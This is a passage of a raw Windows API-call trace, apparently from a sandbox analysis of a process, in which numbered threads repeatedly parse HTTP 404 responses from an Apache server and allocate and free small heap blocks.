[0278.260] GetProcessHeap () returned 0x6a0000 [0278.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0278.261] GetProcessHeap () returned 0x6a0000 [0278.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 501 os_tid = 0x179c [0278.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.453] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.453] GetProcessHeap () returned 0x6a0000 [0278.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be808 [0278.454] GetProcessHeap () returned 0x6a0000 [0278.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be808 | out: hHeap=0x6a0000) returned 1 [0278.454] GetProcessHeap () returned 0x6a0000 [0278.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 502 os_tid = 0x17a0 [0278.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.735] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.735] GetProcessHeap () returned 0x6a0000 [0278.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 [0278.735] GetProcessHeap () returned 0x6a0000 [0278.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0278.735] GetProcessHeap () returned 0x6a0000 [0278.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 503 os_tid = 0x17a8 [0278.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0278.962] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0278.962] GetProcessHeap () returned 0x6a0000 [0278.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 [0278.962] GetProcessHeap () returned 0x6a0000 [0278.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0278.962] GetProcessHeap () returned 0x6a0000 [0278.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 504 os_tid = 0x17ac [0279.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.224] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.224] GetProcessHeap () returned 0x6a0000 [0279.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0279.224] GetProcessHeap () returned 0x6a0000 [0279.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0279.224] GetProcessHeap () returned 0x6a0000 [0279.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 505 os_tid = 0x17b0 [0279.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.424] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.424] GetProcessHeap () returned 0x6a0000 [0279.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0279.424] GetProcessHeap () returned 0x6a0000 [0279.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0279.424] GetProcessHeap () returned 0x6a0000 [0279.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 506 os_tid = 0x17b8 [0279.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.663] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.663] GetProcessHeap () returned 0x6a0000 [0279.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0279.663] GetProcessHeap () returned 0x6a0000 [0279.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0279.663] GetProcessHeap () returned 0x6a0000 [0279.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 507 os_tid = 0x17bc [0279.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0279.856] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0279.856] GetProcessHeap () returned 0x6a0000 [0279.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0279.856] GetProcessHeap () returned 0x6a0000 [0279.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0279.856] GetProcessHeap () returned 0x6a0000 [0279.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 508 os_tid = 0x17c0 [0280.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.107] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.107] GetProcessHeap () returned 0x6a0000 [0280.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0280.107] GetProcessHeap () returned 0x6a0000 [0280.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0280.107] GetProcessHeap () returned 0x6a0000 [0280.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 509 os_tid = 0x17c4 [0280.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.415] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.415] GetProcessHeap () returned 0x6a0000 [0280.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0280.415] GetProcessHeap () returned 0x6a0000 [0280.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0280.415] GetProcessHeap () returned 0x6a0000 [0280.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 510 os_tid = 0x17c8 [0280.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.642] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.642] GetProcessHeap () returned 0x6a0000 [0280.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0280.642] GetProcessHeap () returned 0x6a0000 [0280.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0280.642] GetProcessHeap () returned 0x6a0000 [0280.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 511 os_tid = 0x17cc [0280.809] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0280.810] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0280.810] GetProcessHeap () returned 0x6a0000 [0280.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0280.810] GetProcessHeap () returned 0x6a0000 [0280.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0280.810] GetProcessHeap () returned 0x6a0000 [0280.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 512 os_tid = 0x17d0 [0281.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.038] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.038] GetProcessHeap () returned 0x6a0000 [0281.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0281.038] GetProcessHeap () returned 0x6a0000 [0281.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0281.038] GetProcessHeap () returned 0x6a0000 [0281.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 513 os_tid = 0x17d4 [0281.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.246] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.246] GetProcessHeap () returned 0x6a0000 [0281.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0281.247] GetProcessHeap () returned 0x6a0000 [0281.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0281.247] GetProcessHeap () returned 0x6a0000 [0281.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 514 os_tid = 0x17d8 [0281.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0281.458] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0281.458] GetProcessHeap () returned 0x6a0000 [0281.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0281.458] GetProcessHeap () returned 0x6a0000 [0281.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0281.458] GetProcessHeap () returned 0x6a0000 [0281.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 515 os_tid = 0x17dc [0282.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.061] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.061] GetProcessHeap () returned 0x6a0000 [0282.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0282.061] GetProcessHeap () returned 0x6a0000 [0282.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0282.061] GetProcessHeap () returned 0x6a0000 [0282.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 516 os_tid = 0x17e0 [0282.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.297] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.297] GetProcessHeap () returned 0x6a0000 [0282.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0282.297] GetProcessHeap () returned 0x6a0000 [0282.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0282.297] GetProcessHeap () returned 0x6a0000 [0282.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 517 os_tid = 0x17e4 [0282.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.562] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.562] GetProcessHeap () returned 0x6a0000 [0282.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0282.562] GetProcessHeap () returned 0x6a0000 [0282.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0282.563] GetProcessHeap () returned 0x6a0000 [0282.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 518 os_tid = 0x17e8 [0282.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0282.860] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0282.861] GetProcessHeap () returned 0x6a0000 [0282.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0282.861] GetProcessHeap () returned 0x6a0000 [0282.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0282.861] GetProcessHeap () returned 0x6a0000 [0282.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 519 os_tid = 0x17ec [0283.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.122] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.122] GetProcessHeap () returned 0x6a0000 [0283.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0283.122] GetProcessHeap () returned 0x6a0000 [0283.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0283.122] GetProcessHeap () returned 0x6a0000 [0283.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 520 os_tid = 0x17f0 [0283.413] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.414] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.414] GetProcessHeap () returned 0x6a0000 [0283.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0283.414] GetProcessHeap () returned 0x6a0000 [0283.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0283.414] GetProcessHeap () returned 0x6a0000 [0283.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 521 os_tid = 0x17f4 [0283.740] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.741] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.741] GetProcessHeap () returned 0x6a0000 [0283.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0283.741] GetProcessHeap () returned 0x6a0000 [0283.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0283.741] GetProcessHeap () returned 0x6a0000 [0283.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 522 os_tid = 0x17f8 [0283.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0283.885] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0283.885] GetProcessHeap () returned 0x6a0000 [0283.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7f0 [0283.885] GetProcessHeap () returned 0x6a0000 [0283.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7f0 | out: hHeap=0x6a0000) returned 1 [0283.885] GetProcessHeap () returned 0x6a0000 [0283.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 523 os_tid = 0x17fc [0284.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.097] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.097] GetProcessHeap () returned 0x6a0000 [0284.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0284.097] GetProcessHeap () returned 0x6a0000 [0284.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0284.097] GetProcessHeap () returned 0x6a0000 [0284.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 524 os_tid = 0x6a4 [0284.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.359] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.359] GetProcessHeap () returned 0x6a0000 [0284.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0284.359] GetProcessHeap () returned 0x6a0000 [0284.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0284.359] GetProcessHeap () returned 0x6a0000 [0284.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 525 os_tid = 0x2f8 [0284.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.552] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.552] GetProcessHeap () returned 0x6a0000 [0284.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0284.552] GetProcessHeap () returned 0x6a0000 [0284.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0284.552] GetProcessHeap () returned 0x6a0000 [0284.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 526 os_tid = 0x139c [0284.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.829] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0284.829] GetProcessHeap () returned 0x6a0000 [0284.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0284.830] GetProcessHeap () returned 0x6a0000 [0284.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0284.830] GetProcessHeap () returned 0x6a0000 [0284.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 527 os_tid = 0x664 [0285.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.222] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.222] GetProcessHeap () returned 0x6a0000 [0285.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0285.222] GetProcessHeap () returned 0x6a0000 [0285.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0285.222] GetProcessHeap () returned 0x6a0000 [0285.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 528 os_tid = 0x5e0 [0285.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.456] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.456] GetProcessHeap () returned 0x6a0000 [0285.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0285.456] GetProcessHeap () returned 0x6a0000 [0285.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0285.456] GetProcessHeap () returned 0x6a0000 [0285.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 529 os_tid = 0x35c [0285.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.660] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.660] GetProcessHeap () returned 0x6a0000 [0285.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0285.660] GetProcessHeap () returned 0x6a0000 [0285.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0285.660] GetProcessHeap () returned 0x6a0000 [0285.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 530 os_tid = 0xbb0 [0285.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0285.876] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0285.876] GetProcessHeap () returned 0x6a0000 [0285.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0285.876] GetProcessHeap () returned 0x6a0000 [0285.876] HeapFree (in: hHeap=0x6a0000, 